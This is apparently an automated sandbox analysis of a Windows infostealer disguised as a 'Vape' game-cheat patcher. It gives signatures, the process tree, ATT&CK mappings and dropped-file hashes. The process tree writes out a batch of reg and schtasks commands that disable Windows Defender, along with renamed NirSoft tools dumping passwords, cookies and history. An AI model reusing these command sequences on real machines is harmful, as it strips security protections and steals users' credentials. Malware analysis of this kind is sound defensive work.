Analysis

  • max time kernel
    42s
  • max time network
    146s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    29-06-2022 16:02

General

  • Target

    Vape_v4.08/Vape_v4.08/Kangaroo Patcher.exe

  • Size

    4.6MB

  • MD5

    55ea9286646485b9216e301dcfb7d67e

  • SHA1

    64c7c3b31299a107af75de929b34eea1b4c119bd

  • SHA256

    5db970f480efa49e46dbb809996e7b17e7860895190dc12f08d0950333757a50

  • SHA512

    3504df32bc188f5cc8fde35f50f9da84beb9c8088d748f401a6484ad16e5f00e3b75613f8ad366b0122a055b92b25df543a6a5534a1822450022361e31073f03

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs
  • Modifies security service 2 TTPs 1 IoCs
  • NirSoft WebBrowserPassView 9 IoCs

    Password recovery tool for various web browsers

  • Nirsoft 23 IoCs
  • Executes dropped EXE 7 IoCs
  • UPX packed file 10 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops startup file 2 IoCs
  • Loads dropped DLL 13 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Vape_v4.08\Vape_v4.08\Kangaroo Patcher.exe
    "C:\Users\Admin\AppData\Local\Temp\Vape_v4.08\Vape_v4.08\Kangaroo Patcher.exe"
    1⤵
    • Drops startup file
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1632
    • C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe
      "C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe" ZhXl39BlhP84+Y4kurA8wpehxxqA0X22IMYZ6Vpiqs4G/n5+wiay/MBsikt3hhZrmtpRmfx9pcQsHVAr8/w5tnwLXQK6oMrc5hD9merrHZ4I6hENViyKLRiMli3xtjnj96r5qXtboJ3zN+/MCfHFqTDVKz66Ppv+/bKSwPjLaXs=
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:1712
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"
        3⤵
          PID:668
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c compile.bat
            4⤵
            • Loads dropped DLL
            PID:1088
            • C:\Users\Admin\AppData\Local\Temp\bfsvc.exe
              C:\Users\Admin\AppData\Local\Temp\bfsvc.exe /capture /Filename "C:\Users\Admin\AppData\Local\Temp\capture.png"
              5⤵
              • Executes dropped EXE
              PID:1492
        • C:\Windows\SysWOW64\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"
          3⤵
            PID:1856
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /c compile.bat
              4⤵
              • Loads dropped DLL
              PID:600
              • C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe
                C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\Admin_Passwords.txt"
                5⤵
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                PID:1588
          • C:\Windows\SysWOW64\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"
            3⤵
              PID:1508
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c compile.bat
                4⤵
                • Loads dropped DLL
                PID:2008
                • C:\Users\Admin\AppData\Local\Temp\winhlp32.exe
                  C:\Users\Admin\AppData\Local\Temp\winhlp32.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies1"
                  5⤵
                  • Executes dropped EXE
                  PID:1572
                • C:\Users\Admin\AppData\Local\Temp\splwow64.exe
                  C:\Users\Admin\AppData\Local\Temp\splwow64.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies2"
                  5⤵
                  • Executes dropped EXE
                  PID:624
                • C:\Users\Admin\AppData\Local\Temp\hh.exe
                  C:\Users\Admin\AppData\Local\Temp\hh.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies3"
                  5⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  PID:984
            • C:\Windows\SysWOW64\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"
              3⤵
                PID:1612
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c compile.bat
                  4⤵
                  • Loads dropped DLL
                  PID:1160
                  • C:\Users\Admin\AppData\Local\Temp\xwizard.exe
                    C:\Users\Admin\AppData\Local\Temp\xwizard.exe /stext "C:\Users\Admin\AppData\Local\Temp\Admin_History.txt"
                    5⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    PID:460
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\dav.bat"
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:1940
              • C:\Windows\SysWOW64\reg.exe
                reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
                3⤵
                  PID:336
                • C:\Windows\SysWOW64\reg.exe
                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                  3⤵
                    PID:672
                  • C:\Windows\SysWOW64\reg.exe
                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                    3⤵
                      PID:1960
                    • C:\Windows\SysWOW64\reg.exe
                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                      3⤵
                        PID:888
                      • C:\Windows\SysWOW64\reg.exe
                        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                        3⤵
                        • Modifies Windows Defender Real-time Protection settings
                        PID:1388
                      • C:\Windows\SysWOW64\reg.exe
                        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                        3⤵
                        • Modifies Windows Defender Real-time Protection settings
                        PID:1316
                      • C:\Windows\SysWOW64\reg.exe
                        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                        3⤵
                        • Modifies Windows Defender Real-time Protection settings
                        PID:1268
                      • C:\Windows\SysWOW64\reg.exe
                        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                        3⤵
                        • Modifies Windows Defender Real-time Protection settings
                        PID:1084
                      • C:\Windows\SysWOW64\reg.exe
                        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                        3⤵
                        • Modifies Windows Defender Real-time Protection settings
                        PID:668
                      • C:\Windows\SysWOW64\reg.exe
                        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                        3⤵
                          PID:1580
                        • C:\Windows\SysWOW64\reg.exe
                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f┬┤
                          3⤵
                            PID:1352
                          • C:\Windows\SysWOW64\reg.exe
                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                            3⤵
                              PID:1920
                            • C:\Windows\SysWOW64\reg.exe
                              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
                              3⤵
                                PID:1088
                              • C:\Windows\SysWOW64\reg.exe
                                reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                                3⤵
                                  PID:1996
                                • C:\Windows\SysWOW64\reg.exe
                                  reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                                  3⤵
                                    PID:1500
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                                    3⤵
                                      PID:304
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                                      3⤵
                                        PID:1664
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                        3⤵
                                          PID:1792
                                        • C:\Windows\SysWOW64\schtasks.exe
                                          schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                          3⤵
                                            PID:1552
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                            3⤵
                                              PID:1308
                                            • C:\Windows\SysWOW64\reg.exe
                                              reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
                                              3⤵
                                                PID:284
                                              • C:\Windows\SysWOW64\reg.exe
                                                reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
                                                3⤵
                                                  PID:1636
                                                • C:\Windows\SysWOW64\reg.exe
                                                  reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                                                  3⤵
                                                    PID:1860
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                                                    3⤵
                                                      PID:560
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                                                      3⤵
                                                        PID:1520
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                                        3⤵
                                                          PID:316
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                                          3⤵
                                                            PID:940
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                                            3⤵
                                                              PID:912
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                              3⤵
                                                                PID:1700
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                                                                3⤵
                                                                • Modifies security service
                                                                PID:1656
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1632 -s 1096
                                                              2⤵
                                                              • Program crash
                                                              PID:2012

                                                          Network

                                                          MITRE ATT&CK Matrix ATT&CK v6

                                                          Persistence

                                                          Modify Existing Service

                                                          2
                                                          T1031

                                                          Defense Evasion

                                                          Modify Registry

                                                          2
                                                          T1112

                                                          Disabling Security Tools

                                                          1
                                                          T1089

                                                          Credential Access

                                                          Credentials in Files

                                                          1
                                                          T1081

                                                          Discovery

                                                          System Information Discovery

                                                          1
                                                          T1082

                                                          Collection

                                                          Data from Local System

                                                          1
                                                          T1005

                                                          Command and Control

                                                          Web Service

                                                          1
                                                          T1102

                                                          Replay Monitor

                                                          Loading Replay Monitor...

                                                          Downloads

                                                          • C:\Users\Admin\AppData\Local\Temp\Admin_History.txt
                                                            Filesize

                                                            2B

                                                            MD5

                                                            f3b25701fe362ec84616a93a45ce9998

                                                            SHA1

                                                            d62636d8caec13f04e28442a0a6fa1afeb024bbb

                                                            SHA256

                                                            b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

                                                            SHA512

                                                            98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

                                                          • C:\Users\Admin\AppData\Local\Temp\Admin_Passwords.txt
                                                            Filesize

                                                            2B

                                                            MD5

                                                            f3b25701fe362ec84616a93a45ce9998

                                                            SHA1

                                                            d62636d8caec13f04e28442a0a6fa1afeb024bbb

                                                            SHA256

                                                            b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

                                                            SHA512

                                                            98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

                                                          • C:\Users\Admin\AppData\Local\Temp\Cookies1
                                                            Filesize

                                                            2B

                                                            MD5

                                                            f3b25701fe362ec84616a93a45ce9998

                                                            SHA1

                                                            d62636d8caec13f04e28442a0a6fa1afeb024bbb

                                                            SHA256

                                                            b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

                                                            SHA512

                                                            98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

                                                          • C:\Users\Admin\AppData\Local\Temp\Cookies3
                                                            Filesize

                                                            2B

                                                            MD5

                                                            f3b25701fe362ec84616a93a45ce9998

                                                            SHA1

                                                            d62636d8caec13f04e28442a0a6fa1afeb024bbb

                                                            SHA256

                                                            b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

                                                            SHA512

                                                            98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

                                                          • C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe
                                                            Filesize

                                                            4.4MB

                                                            MD5

                                                            3405f654559010ca2ae38d786389f0f1

                                                            SHA1

                                                            8ac5552c64dfc3ccf0c678f6f946ee23719cf43d

                                                            SHA256

                                                            bc1364d8e68f515f9f35a6b41c11a649b1f514302eb01812c68c9a95a3198b30

                                                            SHA512

                                                            cb1e5ffed2ab86502ea4236383e9a4211a14b1abda13babbcceea67700c5746b37b4da6e45e10196eb76fa1e6959e71f19c6827466a54df1d5ba5ad2e16fc05b

                                                          • C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe
                                                            Filesize

                                                            4.4MB

                                                            MD5

                                                            3405f654559010ca2ae38d786389f0f1

                                                            SHA1

                                                            8ac5552c64dfc3ccf0c678f6f946ee23719cf43d

                                                            SHA256

                                                            bc1364d8e68f515f9f35a6b41c11a649b1f514302eb01812c68c9a95a3198b30

                                                            SHA512

                                                            cb1e5ffed2ab86502ea4236383e9a4211a14b1abda13babbcceea67700c5746b37b4da6e45e10196eb76fa1e6959e71f19c6827466a54df1d5ba5ad2e16fc05b

                                                          • C:\Users\Admin\AppData\Local\Temp\bfsvc.cfg
                                                            Filesize

                                                            420B

                                                            MD5

                                                            51c9e864182413f35b76d42d435df261

                                                            SHA1

                                                            dc5ec227ab38093927a119b4d646c3811c3553cd

                                                            SHA256

                                                            e6c5c674268a865db840afd3764cd498bdfd8fe677c5193d662abbe64d68975b

                                                            SHA512

                                                            b36e683b6487bfbf4e512214343128e57a52eb71356345caba70a98dc5b0bad764da842d08443d3b47bd3dddbe24af146c561ae480038c95f124a51565e3fd99

                                                          • C:\Users\Admin\AppData\Local\Temp\bfsvc.exe
                                                            Filesize

                                                            71KB

                                                            MD5

                                                            899d3ed011eb58459b8a4fc2b81f0924

                                                            SHA1

                                                            80361f1e0b93143ec1ddfee156760f5938c85791

                                                            SHA256

                                                            5e3f311ae67f046b56435067bcdd39fbf836fa0421fbc8c8b0e43e8e47524954

                                                            SHA512

                                                            802ee4f8d25417589c7e62f0acc9dc2dc8f1d32654ca435f6aeae2926e6900373648790451c9143856a772a49c2a8f3c8659c5b8260f0f67559aeef875825f05

                                                          • C:\Users\Admin\AppData\Local\Temp\bfsvc.exe
                                                            Filesize

                                                            71KB

                                                            MD5

                                                            899d3ed011eb58459b8a4fc2b81f0924

                                                            SHA1

                                                            80361f1e0b93143ec1ddfee156760f5938c85791

                                                            SHA256

                                                            5e3f311ae67f046b56435067bcdd39fbf836fa0421fbc8c8b0e43e8e47524954

                                                            SHA512

                                                            802ee4f8d25417589c7e62f0acc9dc2dc8f1d32654ca435f6aeae2926e6900373648790451c9143856a772a49c2a8f3c8659c5b8260f0f67559aeef875825f05

                                                          • C:\Users\Admin\AppData\Local\Temp\compile.bat
                                                            Filesize

                                                            70B

                                                            MD5

                                                            d90accebb3f79fe65cd938425c07b0ae

                                                            SHA1

                                                            9df3812a88d87dd419cd9e89afa5fb1d71be0dc9

                                                            SHA256

                                                            aca74cefaef4b7a32338c9c63187cffa1e808b54ab218a064007683ad1bd3a0e

                                                            SHA512

                                                            44013bfda1dbe5b217d4872e8d550cd00471cb8b969ffd6b07f83b0c59ac20ec2512d275a4603cc00e5de3a04666f66e897601ba51a5e02af622e5139ac04560

                                                          • C:\Users\Admin\AppData\Local\Temp\compile.bat
                                                            Filesize

                                                            156B

                                                            MD5

                                                            eb51755b637423154d1341c6ee505f50

                                                            SHA1

                                                            d71d27e283b26e75e58c0d02f91d91a2e914c959

                                                            SHA256

                                                            db903aae119dc795581080a528ba04286be11be7e9d417305d77123545fbf0f9

                                                            SHA512

                                                            e23463fe0a3719c2700826b55f375f60e5e67f3e432aa8e90c5afc8f449fc635aa4c031f9b6fa71344a8da9542585b74e4c812383043868a10a1065d477acee5

                                                          • C:\Users\Admin\AppData\Local\Temp\compile.bat
                                                            Filesize

                                                            74B

                                                            MD5

                                                            808099bfbd62ec04f0ed44959bbc6160

                                                            SHA1

                                                            f4b6853d958c2c4416f6e4a5be8a11d86f64c023

                                                            SHA256

                                                            f465a1bd2f9a3efcf0589f0b1c234d285f2bebf7416b324271d987a282915ca8

                                                            SHA512

                                                            e4f75253a402f0f5d5c651cde045757dad0d4312be023fabf279d7c053fde6ba63cf387551a0451585a87f929634e0bfa73a06dac85ecd1bb5bc0b72bb98e1f0

                                                          • C:\Users\Admin\AppData\Local\Temp\compile.bat
                                                            Filesize

                                                            71B

                                                            MD5

                                                            91128da441ad667b8c54ebeadeca7525

                                                            SHA1

                                                            24b5c77fb68db64cba27c338e4373a455111a8cc

                                                            SHA256

                                                            50801c4db374acec11831bf7602cd2635bc8964800c67217b25683dce4a45873

                                                            SHA512

                                                            bd2a8bc4458b1bc85c5a59db872278197bb0a2a2086a1a9aa5b6b876965b9f5586959171f334237588cc6b0f9643f580db2e959f82e451f4a3043a27e4a95cdd

                                                          • C:\Users\Admin\AppData\Local\Temp\compile.vbs
                                                            Filesize

                                                            265B

                                                            MD5

                                                            ca906422a558f4bc9e471709f62ec1a9

                                                            SHA1

                                                            e3da070007fdeae52779964df6f71fcb697ffb06

                                                            SHA256

                                                            abf09cb96f4c04a1d2d2bfd7184da63dd79c2109b1a768ca5dae4265def39eee

                                                            SHA512

                                                            661d4b4130ba12281527db418f71b7213dab62931806e2bd48690cfaed65b8a2859e5b161eaa4152d5a18babb54d6c2203f4ef5e3a1153c468d67703fd79f66b

                                                          • C:\Users\Admin\AppData\Local\Temp\compile.vbs
                                                            Filesize

                                                            265B

                                                            MD5

                                                            ca906422a558f4bc9e471709f62ec1a9

                                                            SHA1

                                                            e3da070007fdeae52779964df6f71fcb697ffb06

                                                            SHA256

                                                            abf09cb96f4c04a1d2d2bfd7184da63dd79c2109b1a768ca5dae4265def39eee

                                                            SHA512

                                                            661d4b4130ba12281527db418f71b7213dab62931806e2bd48690cfaed65b8a2859e5b161eaa4152d5a18babb54d6c2203f4ef5e3a1153c468d67703fd79f66b

                                                          • C:\Users\Admin\AppData\Local\Temp\compile.vbs
                                                            Filesize

                                                            265B

                                                            MD5

                                                            ca906422a558f4bc9e471709f62ec1a9

                                                            SHA1

                                                            e3da070007fdeae52779964df6f71fcb697ffb06

                                                            SHA256

                                                            abf09cb96f4c04a1d2d2bfd7184da63dd79c2109b1a768ca5dae4265def39eee

                                                            SHA512

                                                            661d4b4130ba12281527db418f71b7213dab62931806e2bd48690cfaed65b8a2859e5b161eaa4152d5a18babb54d6c2203f4ef5e3a1153c468d67703fd79f66b

                                                          • C:\Users\Admin\AppData\Local\Temp\compile.vbs
                                                            Filesize

                                                            265B

                                                            MD5

                                                            ca906422a558f4bc9e471709f62ec1a9

                                                            SHA1

                                                            e3da070007fdeae52779964df6f71fcb697ffb06

                                                            SHA256

                                                            abf09cb96f4c04a1d2d2bfd7184da63dd79c2109b1a768ca5dae4265def39eee

                                                            SHA512

                                                            661d4b4130ba12281527db418f71b7213dab62931806e2bd48690cfaed65b8a2859e5b161eaa4152d5a18babb54d6c2203f4ef5e3a1153c468d67703fd79f66b

                                                          • C:\Users\Admin\AppData\Local\Temp\config
                                                            Filesize

                                                            106B

                                                            MD5

                                                            519c6696def8e6c2cd0b5ababb4e169c

                                                            SHA1

                                                            70fefa208ee058d643a33570274fd9915dabc02d

                                                            SHA256

                                                            8f5ee072732db50232fbe6f6f288ed9ebb4962c612c3ed964319d1d9cb460895

                                                            SHA512

                                                            673eda4dd69bb2f4031bb3657c53f5471144f7177f799badef5343573bc7a803c55bac0100244f73977b4ae093f575de2e651779af57cab1ea3e2e58c13bb39a

                                                          • C:\Users\Admin\AppData\Local\Temp\dav.bat
                                                            Filesize

                                                            3KB

                                                            MD5

                                                            fc3c88c2080884d6c995d48e172fbc4f

                                                            SHA1

                                                            cb1dcc479ad2533f390786b0480f66296b847ad3

                                                            SHA256

                                                            1637ce704a463bd3c91a38aa02d1030107670f91ee3f0dd4fa13d07a77ba2664

                                                            SHA512

                                                            4807d3bd44a3197d1a9dcf709a1e70e1cf3bf71fe1a9fa1479441b598154c282a620208557a4415a34d23ceb4fd32dda41edbb940b46acb2f00c696648703bf1

                                                          • C:\Users\Admin\AppData\Local\Temp\hh.exe
                                                            Filesize

                                                            103KB

                                                            MD5

                                                            4d4c98eca32b14aeb074db34cd0881e4

                                                            SHA1

                                                            92f213d609bba05d41d6941652a88c44936663a4

                                                            SHA256

                                                            4182172a01bdfc08c5cf7e8652f7d9d81858345a770e2b6b507840e4c1c7764f

                                                            SHA512

                                                            959da8bbf6084e802ed366de8d240382b8a5ab2f18bc58881f42ecb7a8ed082d0e078b3ad18dbf90ac0a14cd491b5ac8b00cf1f0a266bdb7ebb8d95c5c71cacf

                                                          • C:\Users\Admin\AppData\Local\Temp\hh.exe
                                                            Filesize

                                                            103KB

                                                            MD5

                                                            4d4c98eca32b14aeb074db34cd0881e4

                                                            SHA1

                                                            92f213d609bba05d41d6941652a88c44936663a4

                                                            SHA256

                                                            4182172a01bdfc08c5cf7e8652f7d9d81858345a770e2b6b507840e4c1c7764f

                                                            SHA512

                                                            959da8bbf6084e802ed366de8d240382b8a5ab2f18bc58881f42ecb7a8ed082d0e078b3ad18dbf90ac0a14cd491b5ac8b00cf1f0a266bdb7ebb8d95c5c71cacf

                                                          • C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe
                                                            Filesize

                                                            391KB

                                                            MD5

                                                            053778713819beab3df309df472787cd

                                                            SHA1

                                                            99c7b5827df89b4fafc2b565abed97c58a3c65b8

                                                            SHA256

                                                            f999357a17e672e87fbed66d14ba2bebd6fb04e058a1aae0f0fdc49a797f58fe

                                                            SHA512

                                                            35a00001c718e36e956f49879e453f18f5d6c66bbc6a3e1aad6d5dd1109904539b173c3cad0009bc021d4513a67ae0003282f7d14b7aecaa20e59a22c6ad0ddb

                                                          • C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe
                                                            Filesize

                                                            391KB

                                                            MD5

                                                            053778713819beab3df309df472787cd

                                                            SHA1

                                                            99c7b5827df89b4fafc2b565abed97c58a3c65b8

                                                            SHA256

                                                            f999357a17e672e87fbed66d14ba2bebd6fb04e058a1aae0f0fdc49a797f58fe

                                                            SHA512

                                                            35a00001c718e36e956f49879e453f18f5d6c66bbc6a3e1aad6d5dd1109904539b173c3cad0009bc021d4513a67ae0003282f7d14b7aecaa20e59a22c6ad0ddb

                                                          • C:\Users\Admin\AppData\Local\Temp\splwow64.exe
                                                            Filesize

                                                            49KB

                                                            MD5

                                                            0d8360781e488e250587a17fbefa646c

                                                            SHA1

                                                            29bc9b438efd70defa8fc45a6f8ee524143f6d04

                                                            SHA256

                                                            ebff7d07efda7245192ce6ecd7767578152b515b510c887ca2880a2566071f64

                                                            SHA512

                                                            940a98f282473c6f706783b41b72eccce88620e12db1f91be6425f087284746e6e10d4d9420b5e79e87ec3a2fd595b9fe301576e39a4db6bd3daa4aa93a9042e

                                                          • C:\Users\Admin\AppData\Local\Temp\splwow64.exe
                                                            Filesize

                                                            49KB

                                                            MD5

                                                            0d8360781e488e250587a17fbefa646c

                                                            SHA1

                                                            29bc9b438efd70defa8fc45a6f8ee524143f6d04

                                                            SHA256

                                                            ebff7d07efda7245192ce6ecd7767578152b515b510c887ca2880a2566071f64

                                                            SHA512

                                                            940a98f282473c6f706783b41b72eccce88620e12db1f91be6425f087284746e6e10d4d9420b5e79e87ec3a2fd595b9fe301576e39a4db6bd3daa4aa93a9042e

                                                          • C:\Users\Admin\AppData\Local\Temp\winhlp32.exe
                                                            Filesize

                                                            184KB

                                                            MD5

                                                            a776e68f497c996788b406a3dc5089eb

                                                            SHA1

                                                            45bf5e512752389fe71f20b64aa344f6ca0cad50

                                                            SHA256

                                                            071e26ddf5323dd9ed6671bcde89df73d78bac2336070e6cb9e3e4b93bde78d1

                                                            SHA512

                                                            02b1234ad37b768b9bcba74daf16e6b45b777f340dac0b64a85166fdd793955e3d7f88a95142b603b198e504ef1173618f840511bcdb70448f71aed19c009073

                                                          • C:\Users\Admin\AppData\Local\Temp\winhlp32.exe
                                                            Filesize

                                                            184KB

                                                            MD5

                                                            a776e68f497c996788b406a3dc5089eb

                                                            SHA1

                                                            45bf5e512752389fe71f20b64aa344f6ca0cad50

                                                            SHA256

                                                            071e26ddf5323dd9ed6671bcde89df73d78bac2336070e6cb9e3e4b93bde78d1

                                                            SHA512

                                                            02b1234ad37b768b9bcba74daf16e6b45b777f340dac0b64a85166fdd793955e3d7f88a95142b603b198e504ef1173618f840511bcdb70448f71aed19c009073

                                                          • C:\Users\Admin\AppData\Local\Temp\xwizard.cfg
                                                            Filesize

                                                            1KB

                                                            MD5

                                                            ae8eed5a6b1470aec0e7fece8b0669ef

                                                            SHA1

                                                            ca0e896f90c38f3a8bc679ea14c808726d8ef730

                                                            SHA256

                                                            3f6ca2bc068c8436044daab867f8ff8f75060048b29882cb2ac9fdef1800df9e

                                                            SHA512

                                                            e79d04f4041edb867fd6bdf4485f78352292782d9405ba81888a1bc62f5039cc46c6cc786ba1fd53284baafa7128e0f875390cb573584ed2d03c3b33c7f93eb6

                                                          • C:\Users\Admin\AppData\Local\Temp\xwizard.exe
                                                            Filesize

                                                            544KB

                                                            MD5

                                                            df991217f1cfadd9acfa56f878da5ee7

                                                            SHA1

                                                            0b03b34cfb2985a840db279778ca828e69813116

                                                            SHA256

                                                            deb1246347ce88e8cdd63a233a64bc2090b839f2d933a3097a2fd8fd913c4112

                                                            SHA512

                                                            175cde9e0def550f6380b4a9feb6845dfddbb641e2455d9d25dc6bfc7ffc08e654ea731946588961a5825dcc45c8b31972454a330fd97d7170f1991a8dac0316

                                                          • C:\Users\Admin\AppData\Local\Temp\xwizard.exe
                                                            Filesize

                                                            544KB

                                                            MD5

                                                            df991217f1cfadd9acfa56f878da5ee7

                                                            SHA1

                                                            0b03b34cfb2985a840db279778ca828e69813116

                                                            SHA256

                                                            deb1246347ce88e8cdd63a233a64bc2090b839f2d933a3097a2fd8fd913c4112

                                                            SHA512

                                                            175cde9e0def550f6380b4a9feb6845dfddbb641e2455d9d25dc6bfc7ffc08e654ea731946588961a5825dcc45c8b31972454a330fd97d7170f1991a8dac0316

                                                          • \Users\Admin\AppData\Local\Temp\RtkBtManServ.exe
                                                            Filesize

                                                            4.4MB

                                                            MD5

                                                            3405f654559010ca2ae38d786389f0f1

                                                            SHA1

                                                            8ac5552c64dfc3ccf0c678f6f946ee23719cf43d

                                                            SHA256

                                                            bc1364d8e68f515f9f35a6b41c11a649b1f514302eb01812c68c9a95a3198b30

                                                            SHA512

                                                            cb1e5ffed2ab86502ea4236383e9a4211a14b1abda13babbcceea67700c5746b37b4da6e45e10196eb76fa1e6959e71f19c6827466a54df1d5ba5ad2e16fc05b

                                                          • \Users\Admin\AppData\Local\Temp\bfsvc.exe
                                                            Filesize

                                                            71KB

                                                            MD5

                                                            899d3ed011eb58459b8a4fc2b81f0924

